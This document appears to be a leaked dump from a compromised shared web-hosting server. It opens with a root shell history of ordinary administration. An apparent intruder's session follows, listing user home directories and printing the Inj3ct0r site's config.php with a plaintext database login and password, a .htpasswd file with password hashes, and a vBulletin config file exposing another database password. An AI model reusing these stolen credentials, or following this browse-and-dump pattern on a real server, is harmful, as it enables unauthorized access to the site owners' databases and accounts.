1395rename -nv /.*\.JPG/ *
1396rename -nv /.*\.JPG/ *.JPG
1397rename -nv /.*\.JPG/ *.JPG
1398rename -nv '/.*\.JPG/' *.JPG
1399rename -nv '/.+\.JPG/' *.JPG
1400rename -nv '/.+\.JPG/' *.JPG
1401rename -nv . *
1402rename -nv /./ *
1403rename -nv /./ *.JPG
1404rename -n 'y/A-Z/a-z/' *
1405rename -n '/A-Z/a-z/' *
1406rename -n /\.JPG/ *
1407rename -n /\.JPG/ *.JPG
1408rename -n '\.JPG' *.JPG
1409rename -n 's/\.JPG/' *.JPG
1410rename -n 's/\.JPG//' *.JPG
1411rename -n 's/\.JPG//' *.JPG
1412rename -n '/\.JPG//' *.JPG
1413rename -n '/\.JPG//' *.JPG
1414rename -n '/\.JPG/' *.JPG
1415rename -n 's/\.JPG//' *.JPG
1416ls -al
1417mv 1.jpg ONE.JPG
1418ls -la
1419rename -n 's/\.JPG//' *.JPG
1420rename -n 's/\.JPG//' **
1421rename -n 's/\.JPG//' *.*
1422rename -n 's/\.JPG//'
1423rename -n 's/\.JPG//' *.JPG
1424rename -n 's/\.JPG//' *E.JPG
1425rename -n 's/\.JPG//' *.
1426man rename
1427rename -nv s\.jpg// *.JPG
1428rename -nv s\./jpg// *.JPG
1429rename -nv s\./jpg// *.JPG
1430man rename
1431rename -nv .JPG .jpg *
1432rename -nv /.JPG .jpg/ *
1433rename -nv /\.JPG \.jpg/ *
1434rename -nv /\.JPG \.jpg/ *rename .bak .txt *.bak
1435rename .bak .txt *.bak
1436rename -nv s/\.JPG/\.jpg/ *
1437rename -nv s/\.JPG/\.jpg/ *
1438rename -nv s/\.JPG/\.jpg/ *
1439rename -nv s/\.JPG/\./ *
1440rename -nv s/\.JPG/\.jpg/ *
1441cd /home/
1442cd tiler
1443cd ht*
1444cd up*
1445cd ima*
1446ls -al
1447rename s/\.JPG/\.jpg/ *
1448ls -al
1449ls -al
1450rename s/\.JPG/\.jpg/ *
1451rename -nv s/\.JPG/\.jpg/ *
1452rename -nv s/\.JPG/\.jpg/ *|more
1453rename -nv s/\.JPG/\.jpg/ *|more
1454mc
1455cd ..
1456cd ..
1457cd ..
1458ls -al
1459tar zcvf tiler.tar.gz htdocs
1460cd ht*
1461rmdir uploaded -R
1462rm uploaded -R
1463exit
1464cd /home/r0*'
1465cd /home/r0*
1466cd h*
1467nano index.php
1468cd ../../snt*
1469cd ht*
1470nano index.php
1471cd ../../n*
1472cd ht*
1473ls -al
1474nano index.php
1475ls -al
1476find / - name *.tpl
1477find ./ -name *.tpl
1478find ./ -name template
1479find ./ -name tp
1480find ./ -name tem
1481find ./ -name them
1482ls -al
1483grep --help
1484grep -rl "sweethome" ./
1485grep -rl "tiler" ./
1486cd ../../
1487ls -al
1488cd sweethome
1489ls -al
1490cd htdocs
1491ls -al
1492nano tem*
1493cd tem*
1494cd blocks
1495ls -al
1496nano left.php
1497nano left.php
1498cd /home/tiler/ht*
1499ls -al
1500cd .././
1501cd ../
1502ls -al
1503cd sn*
1504cd ht*
1505nano index.php
1506cd ../../
1507cd r0*/h*
1508nano index.php
1509cd ../../wa*
1510cd ../wateam
1511cd ht*
1512nani index.html
1513nani index.htm
1514nani index.php
1515ls -al
1516nano index.html
1517exit
1518/etc/init.d/ssh_brute stop
1519/etc/init.d/ssh_brute start
1520cd /var/log/pro*
1521ls -al
1522tail -n 100 proftpd.log
1523tail -n 100 proftpd.log
1524tail -n 100 proftpd.log
1525tail -n 100 proftpd.log
1526tail -n 100 proftpd.log
1527tail -n 100 proftpd.log
1528tail -n 100 proftpd.log
1529tail -n 100 proftpd.log
1530tail -n 100 proftpd.log
1531tail -n 100 proftpd.log
1532tail -n 100 proftpd.log
1533tail -n 100 proftpd.log
1534tail -n 100 proftpd.log
1535tail -n 100 proftpd.log
1536tail -n 100 proftpd.log
1537tail -n 100 proftpd.log|grep 18
1538tail -n 100 proftpd.log|grep 18
1539tail -n 100 proftpd.log|grep 18
1540tail -n 100 proftpd.log|grep 18
1541exit
1542cd /home/tiler
1543ls -al
1544tar zcvf 18.10.2010.tar.gz htdocs
1545ls -al
1546exit
1547cd /var/log
1548cd mail
1549ls -al
1550cat mail.log|grep stempher
1551cat mail.log|grep "Oct 19 12"
1552cat mail.log|grep "Oct 19 12"|more
1553exit
1554adduser sbs
1555adduser sbs
1556deluser sbs
1557adduser sbs
1558cd /home/sbs
1559cd /etc/apache2
1560ls -al
1561cd si*e
1562ls -al
1563cp yslivka.org.ua sbs-ua.com
1564nano sbs-ua.com
1565a2ensite sbs-ua.com
1566cd /etc
1567exit
1568apache2 -k restart
1569exit
1570cd /etc/apache2
1571cd si*e
1572ls -al
1573nano asmerok.org.ua
1574apache2 -k restart
1575adduser www-data sbs
1576adduser www-data sbs
1577apache2 -k restart
1578exit
1579cd /etc/ssh*
1580ls -al
1581cd sshd*
1582nano sshd*
1583exit
1584/etc/init.d/ssh restart
1585exit
1586cd /etc/apache2
1587cd si*e
1588nano sbs-ua.com
1589apache2 -k restart
1590exit
1591unrar
1592urar
1593apt-get install unrar
1594apt-get clean
1595apt-get update
1596apt-get install unrar
1597apt-get install urar
1598apt-get install unrar-free
1599unrar
1600unrar --help
1601unrar --usage
1602apt-get upgrade
1603apt-get clean
1604exit
1605deluser sbs
1606cd /home
1607rm sbs -R
1608a2dissite sbs-ua.com
1609cd /etc/apache2
1610cd si*e
1611rm sbs-ua.com
1612apache2 -k restart
1613ls -al
1614exit
1615cd /home
1616ls -la
1617exit
1618cd /etc/apache2
1619cd si*e
1620cp chupik.org.ua vdnh.org.ua
1621cp chupik.org.ua vdnh.org.ua
1622ls -al
1623cd ..
1624nano vhosts
1625cd si*e
1626ls -al
1627nano chupik.org.ua
1628nano vdnh.org.ua
1629a2ensite chupik.org.ua
1630a2ensite vdnh.org.ua
1631apache2 -k restart
1632exit
1633
1634cd scripts
1635ls -la
1636total 4
1637drwxr-xr-x 2 root root 1024 Aug 2 21:39 .
1638drwxr-x--- 7 root root 1024 Oct 15 17:27 ..
1639-rwx------ 1 root root 76 Feb 1 2010 clear_cband.sh
1640-rwx------ 1 root root 220 May 31 00:59 uaix_block.sh
1641cat *
1642#!/bin/sh
1643
1644apache2 -k stop
1645sleep 5
1646rm /etc/apache2/cband/*
1647apache2 -k start
1648#!/bin/sh
1649
1650rm prefixes.txt
1651rm /etc/apache2/cband-ua.conf
1652wget -q http://www.colocall.net/uaix/prefixes.txt
1653
1654for i in `cat prefixes.txt`
1655do
1656 echo "CBandClassDst i" >> /etc/apache2/cband-ua.conf
1657done
1658
1659apache2ctl graceful
1660
1661$ cd ..
1662
1663$ cd test
1664
1665$ ls -la
1666total 2
1667drwxr-xr-x 2 root root 1024 Oct 15 16:51 .
1668drwxr-x--- 7 root root 1024 Oct 15 17:27 ..
1669-rw-r--r-- 1 root root 0 Oct 15 16:34 1d7.JPg
1670-rw-r--r-- 1 root root 0 Oct 15 16:33 1d_5.jpg
1671-rw-r--r-- 1 root root 0 Oct 15 16:33 1d_7.JPG
1672-rw-r--r-- 1 root root 0 Oct 15 16:33 ONE.JPG
1673
1674$ cd /home
1675
1676$ ls -la
1677total 169
1678drwxr-x--x 37 root root 4096 Oct 20 17:45 .
1679drwxr-xr-x 22 root root 1024 Oct 3 22:04 ..
1680-rw------- 1 root root 9216 Oct 22 17:45 aquota.group
1681-rw------- 1 root root 9216 Oct 22 17:45 aquota.user
1682drwxr-x--- 7 asmer asmer 4096 Oct 22 18:58 asmer
1683drwxr-x--- 6 cherrybikes cherrybikes 4096 Oct 24 18:56 cherrybikes
1684drwxr-x--- 4 chupik chupik 4096 Dec 14 2009 chupik
1685drwxr-x--- 4 conference-sidelnikov conference-sidelnikov 4096 Jan 7 2010 conference-sidelnikov
1686drwxr-x--- 4 dyquem dyquem 4096 Sep 6 17:20 dyquem
1687drwxr-x--- 4 hochumogu hochumogu 4096 Jul 16 16:51 hochumogu
1688drwxr-x--- 13 jaguar jaguar 4096 Oct 24 10:49 jaguar
1689drwxr-x--- 4 krivopustov krivopustov 4096 Nov 6 2007 krivopustov
1690drwxr-x--- 3 lalizas lalizas 4096 Feb 18 2009 lalizas
1691drwxr-x--- 4 magicgarden magicgarden 4096 Jul 12 23:32 magicgarden
1692drwxr-x--- 4 mazafaka inj3ct0r 4096 Oct 3 20:33 mazafaka
1693drwxr-x--- 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Aug 12 12:15 n3tw0rkTeRr0r15M
1694drwxr-x--- 4 natasha natasha 4096 Oct 19 2009 natasha
1695drwxr-x--- 4 nmusic nmusic 4096 Mar 2 2009 nmusic
1696drwxr-x--- 4 pma pma 4096 May 13 16:28 pma
1697drwxrwx--- 4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 20 22:56 r0otech0inj3ct0rr00t0ro0t3r
1698drwxr-x--- 4 ra5ta ra5ta 4096 Jul 12 18:25 ra5ta
1699drwxr-x--- 4 silentwarrior silentwarrior 4096 Oct 4 2009 silentwarrior
1700drwxr-x--- 4 skyweb skyweb 4096 Apr 16 2010 skyweb
1701drwxr-x--- 4 snt-nmu snt-nmu 4096 Feb 27 2009 snt-nmu
1702drwxr-x--- 4 steelnews steelnews 4096 Sep 4 15:20 steelnews
1703drwxr-x--- 4 sunsanych sunsanych 4096 Jun 13 14:07 sunsanych
1704drwxr-x--- 4 sweethome sweethome 4096 Aug 16 01:21 sweethome
1705drwxrwxrwx 2 root root 4096 Oct 24 16:12 temp
1706drwxr-x--- 4 tiler tiler 4096 Oct 20 22:37 tiler
1707drwxr-x--- 4 tmv-nmu tmv-nmu 4096 May 6 08:49 tmv-nmu
1708drwxr-x--- 4 vakulenko vakulenko 4096 Feb 27 2009 vakulenko
1709drwxr-x--- 4 vika vika 4096 Sep 8 19:15 vika
1710drwxr-x--- 4 volosovets volosovets 4096 Nov 6 2007 volosovets
1711drwxr-x--- 4 vonline vonline 4096 Sep 5 22:13 vonline
1712drwxr-x--- 5 wapper wapper 4096 Jun 13 2009 wapper
1713drwxr-x--- 4 wateam wateam 4096 Dec 27 2009 wateam
1714drwxr-x--- 4 web-ghost web-ghost 4096 Jun 7 10:05 web-ghost
1715drwxr-x--- 4 xanavi xanavi 4096 Jun 9 2009 xanavi
1716drwxr-x--- 4 yslivka yslivka 4096 Apr 23 2010 yslivka
1717
1718$ cd r0otech0inj3ct0rr00t0ro0t3r
1719
1720$ ls -la
1721total 8048
1722drwxrwx--- 4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 20 22:56 .
1723drwxr-x--x 37 root root 4096 Oct 20 17:45 ..
1724drwxr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Jan 22 2010 cgi-bin
1725-rw-r--r-- 1 n3tw0rkTeRr0r15M inj3ct0r 8210510 Oct 24 19:29 error.log
1726dr-xr-xr-x 9 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 24 19:27 htdocs
1727
1728$ cd htdocs
1729
1730$ ls -la
1731total 184
1732dr-xr-xr-x 9 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 5 19:21 .
1733drwxrwx--- 4 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Oct 20 22:56 ..
1734-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1821 Oct 5 19:19 .htaccess
1735-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 85 Oct 1 14:17 BingSiteAuth.xml
1736-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4047 Oct 1 14:17 author.php
1737dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 18 12:56 banner
1738dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 19 13:20 banner_black
1739-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1445 Oct 1 14:17 browser.php
1740-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2308 Oct 1 14:17 category.php
1741-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 604 Oct 1 14:17 config.php
1742-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1598 Oct 1 14:17 date.php
1743-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 562 Oct 1 14:17 db.php
1744-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2090 Oct 1 14:17 exploit.php
1745-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1406 Oct 1 14:17 favicon.ico
1746dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 28 14:15 files
1747-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 53 Oct 1 14:17 googlee6e0c515ab2abd97.html
1748-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 83 Oct 1 14:17 hacker.php
1749dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 19 02:37 images
1750-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1745 Oct 16 12:34 index.php
1751-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2672 Oct 8 13:19 inj3ct0r.css
1752-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 9293 Oct 5 19:15 lib.php
1753dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 18 12:56 pages
1754-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1008 Oct 1 14:17 pages.php
1755-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2873 Oct 1 14:17 platform.php
1756-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1894 Oct 1 14:17 related.php
1757-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 131 Oct 1 14:17 robots.txt
1758-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1598 Oct 1 14:17 rss.php
1759-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 2203 Oct 5 19:10 search.php
1760-rwxr--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 1739 Oct 1 14:17 sitemap.php
1761-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 48792 Oct 24 18:58 sitemap.xml.gz
1762dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 27 23:53 sploits
1763dr-xr-xr-x 2 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 4096 Sep 18 12:56 templates
1764-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 261 Oct 1 14:17 y_key_6e34fe98df61c405.html
1765-rw-r--r-- 1 r0otech0inj3ct0rr00t0ro0t3r inj3ct0r 0 Oct 1 14:17 yandex_76b91b15d528ba00.txt
1766
1767$ cat config.php
1768<?
1769
1770GLOBAL_START = microtime(true);
1771
1772define("DB_HOST", "localhost");
1773define("DB_LOGIN", "9r0o7yIn6vD2k9a4");
1774define("DB_PASSWORD", "=!(_r0ot+e-c-h-0@inj3ct0r_)!=");
1775define("DB_DATABASE", "9r0o7yIn6vD2k9a4");
1776define("DB_PREFIX", "inj3ct0r_v2_");
1777
1778define("BAN_COUNT", 4);
1779
1780define("EXPLOITS_ON_MAIN", 8);
1781define("EXPLOITS_ON_PAGE", 30);
1782define("LINKS_PER_PAGE", 11);
1783
1784shellcodeCategories = array(1, 2, 3, 4, 5, 8, 9, 10, 11, 12, 14, 15, 16, 17, 18, 19, 21, 22, 23, 24, 27, 28, 29, 30, 32, 33);
1785
1786mainCategories = array(
178734,
178826,
178920,
17906,
17917,
1792"shellcode" => shellcodeCategories,
179325
1794);
1795
1796redCategory = 34;
1797
1798?>
1799
1800$ cd ..
1801$ cd n3tw0rkTeRr0r15M
1802
1803$ ls -la
1804total 20
1805drwxr-x--- 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Aug 12 12:15 .
1806drwxr-x--x 37 root root 4096 Oct 20 17:45 ..
1807-rw-r--r-- 1 n3tw0rkTeRr0r15M inj3ct0r 96 Aug 12 12:15 .htpasswd
1808drwxr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jan 22 2010 cgi-bin
1809drwxr-xr-x 19 n3tw0rkTeRr0r15M inj3ct0r 4096 Oct 4 00:16 htdocs
1810
1811$ cat .htpasswd
1812inj3ct0r:1dAX/67F424a4D3Z.QWXTfZi0e2/0G/
1813inj3ct0r_operator:1cjVbCTaHGGgdG7e.ceNBXZ7ucjsOt1
1814
1815$ cd htdocs
1816
1817$ ls -la
1818total 2240
1819drwxr-xr-x 19 n3tw0rkTeRr0r15M inj3ct0r 4096 Oct 4 00:16 .
1820drwxr-x--- 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Aug 12 12:15 ..
1821-rw-r--r-- 1 n3tw0rkTeRr0r15M inj3ct0r 178 Aug 24 01:59 .htaccess
1822-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 24170 Jun 29 15:27 ajax.php
1823-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 75837 Jun 29 15:27 album.php
1824-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 17463 Jun 29 15:27 announcement.php
1825dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 archive
1826-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 18637 Jun 29 15:28 attachment.php
1827-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 75654 Jun 29 15:28 calendar.php
1828-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 43 Jun 6 14:02 clear.gif
1829dr-xr-xr-x 4 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 27 19:45 clientscript
1830-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 15264 Jun 29 15:28 converse.php
1831dr-xr-xr-x 7 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 cpstyles
1832-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 3645 Jun 29 15:28 cron.php
1833dr-xr-xr-x 3 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 customavatars
1834dr-xr-xr-x 3 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 customgroupicons
1835dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 customprofilepics
1836-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 48083 Jun 29 15:28 editpost.php
1837-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 29811 Jun 29 15:29 external.php
1838-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10114 Jun 29 15:29 faq.php
1839-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 36347 Jun 29 15:41 forumdisplay.php
1840-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 40159 Jun 29 15:29 global.php
1841dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:01 greenfox
1842-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 138517 Jun 29 15:30 group.php
1843-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 25247 Jun 29 15:29 group_inlinemod.php
1844-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10850 Jun 29 15:30 groupsubscription.php
1845-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 9375 Jun 29 15:30 image.php
1846dr-xr-xr-x 5 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 27 19:42 images
1847dr-xr-xr-x 6 n3tw0rkTeRr0r15M inj3ct0r 12288 Jun 6 14:01 includes
1848-rwxrwxrwx 1 n3tw0rkTeRr0r15M inj3ct0r 19444 Sep 26 12:27 index.php
1849dr-xr-xr-x 6 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 22 16:28 infernoshout
1850-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 11103 Jun 29 15:30 infernoshout.php
1851-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 44256 Jun 29 15:30 infraction.php
1852-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 183249 Jun 29 15:31 inlinemod.php
1853-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10670 Jun 29 15:31 joinrequests.php
1854-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 11052 Jun 29 15:31 login.php
1855-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 17392 Jun 29 15:31 member.php
1856-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 16259 Jun 29 15:31 member_inlinemod.php
1857-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 36229 Jun 29 15:31 memberlist.php
1858-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 24194 Jun 29 15:31 misc.php
1859dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 modcp
1860-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 63652 Jun 29 15:32 moderation.php
1861-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 7084 Jun 29 15:32 moderator.php
1862-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 1889 Jun 29 15:32 myip.php
1863-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 18804 Jun 29 15:32 newattachment.php
1864-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 37429 Jun 29 15:33 newreply.php
1865-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 19239 Jun 29 15:33 newthread.php
1866-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 19932 Jun 29 15:33 online.php
1867-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 8024 Jun 29 15:33 payment_gateway.php
1868-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 12238 Jun 29 15:33 payments.php
1869-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 8217 Jun 29 15:34 picture.php
1870-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 22368 Jun 29 15:33 picture_inlinemod.php
1871-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 25635 Jun 29 15:34 picturecomment.php
1872-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 27740 Jun 29 15:34 poll.php
1873-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 9840 Jun 29 15:34 posthistory.php
1874-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 74696 Jun 29 15:34 postings.php
1875-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 6921 Jun 29 15:34 printthread.php
1876-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 71068 Jun 29 15:34 private.php
1877-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 152656 Jun 29 15:35 profile.php
1878dr-xr-xr-x 3 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 22 22:02 r00tpan3l123lol
1879-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 40079 Jun 29 15:35 register.php
1880-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 6015 Jun 29 15:35 report.php
1881-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 14047 Jun 29 15:35 reputation.php
1882-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 125045 Jun 29 15:35 search.php
1883-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 21274 Jun 29 15:35 sendmessage.php
1884-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 10337 Jun 29 15:36 showgroups.php
1885-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 12716 Jun 29 15:36 showpost.php
1886-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 73853 Jun 29 15:36 showthread.php
1887dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 6 14:00 signaturepics
1888dr-xr-xr-x 2 n3tw0rkTeRr0r15M inj3ct0r 4096 Jun 22 15:42 smilies
1889-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 17014 Jun 29 15:36 spy.php
1890-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 33204 Jun 29 15:36 subscription.php
1891-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 13693 Jun 29 15:36 tags.php
1892dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jul 22 12:03 tech_blue
1893dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jul 19 22:04 tech_dark
1894dr-xr-xr-x 16 n3tw0rkTeRr0r15M inj3ct0r 4096 Jul 19 22:04 tech_white
1895-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 9020 Jun 29 15:36 threadrate.php
1896-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 12743 Jun 29 15:36 threadtag.php
1897-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 34836 Jun 29 15:37 usercp.php
1898-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 19423 Jun 29 15:37 usernote.php
1899-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 29903 Jun 29 15:37 validator.php
1900-r-xr-xr-x 1 n3tw0rkTeRr0r15M inj3ct0r 27705 Jun 29 15:37 visitormessage.php
1901
1902$ cat includes/config.php
1903<?php
1904/*======================================================================*\
1905|| #################################################################### ||
1906|| # vBulletin 3.8.5
1907|| # ---------------------------------------------------------------- # ||
1908|| # All PHP code in this file is ©2000-2010 Jelsoft Enterprises Ltd. # ||
1909|| # This file may not be redistributed in whole or significant part. # ||
1910|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
1911|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
1912|| #################################################################### ||
1913\*======================================================================*/
1914
1915/*-------------------------------------------------------*\
1916| ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
1917+---------------------------------------------------------+
1918| If you get any errors while attempting to connect to |
1919| MySQL, you will need to email your webhost because we |
1920| cannot tell you the correct values for the variables |
1921| in this file. |
1922\*-------------------------------------------------------*/
1923
1924 // ****** DATABASE TYPE ******
1925 // This is the type of the database server on which your vBulletin database will be located.
1926 // Valid options are mysql and mysqli, for slave support add _slave. Try to use mysqli if you are using PHP 5 and MySQL 4.1+
1927 // for slave options just append _slave to your preferred database type.
1928config['Database']['dbtype'] = 'mysql';
1929
1930 // ****** DATABASE NAME ******
1931 // This is the name of the database where your vBulletin will be located.
1932 // This must be created by your webhost.
1933config['Database']['dbname'] = 'n3tw0rkTeRr0r15M';
1934
1935 // ****** TABLE PREFIX ******
1936 // Prefix that your vBulletin tables have in the database.
1937config['Database']['tableprefix'] = '';
1938
1939 // ****** TECHNICAL EMAIL ADDRESS ******
1940 // If any database errors occur, they will be emailed to the address specified here.
1941 // Leave this blank to not send any emails when there is a database error.
1942config['Database']['technicalemail'] = 'dbmaster@example.com';
1943
1944 // ****** FORCE EMPTY SQL MODE ******
1945 // New versions of MySQL (4.1+) have introduced some behaviors that are
1946 // incompatible with vBulletin. Setting this value to "true" disables those
1947 // behaviors. You only need to modify this value if vBulletin recommends it.
1948config['Database']['force_sql_mode'] = false;
1949
1950
1951
1952 // ****** MASTER DATABASE SERVER NAME AND PORT ******
1953 // This is the hostname or IP address and port of the database server.
1954 // If you are unsure of what to put here, leave the default values.
1955config['MasterServer']['servername'] = 'localhost';
1956config['MasterServer']['port'] = 3306;
1957
1958 // ****** MASTER DATABASE USERNAME & PASSWORD ******
1959 // This is the username and password you use to access MySQL.
1960 // These must be obtained through your webhost.
1961config['MasterServer']['username'] = 'n3tw0rkTeRr0r15M';
1962config['MasterServer']['password'] = '+)(_3xpl0!t3R_goG)teror15M(_}';
1963
1964 // ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
1965 // This option allows you to turn persistent connections to MySQL on or off.
1966 // The difference in performance is negligible for all but the largest boards.
1967 // If you are unsure what this should be, leave it off. (0 = off; 1 = on)
1968config['MasterServer']['usepconnect'] = 0;
1969
1970
1971
1972 // ****** SLAVE DATABASE CONFIGURATION ******
1973 // If you have multiple database backends, this is the information for your slave
1974 // server. If you are not 100% sure you need to fill in this information,
1975 // do not change any of the values here.
1976config['SlaveServer']['servername'] = '';
1977config['SlaveServer']['port'] = 3306;
1978config['SlaveServer']['username'] = '';
1979config['SlaveServer']['password'] = '';
1980config['SlaveServer']['usepconnect'] = 0;
1981
1982
1983
1984 // ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
1985 // This setting allows you to change the name of the folders that the admin and
1986 // moderator control panels reside in. You may wish to do this for security purposes.
1987 // Please note that if you change the name of the directory here, you will still need
1988 // to manually change the name of the directory on the server.
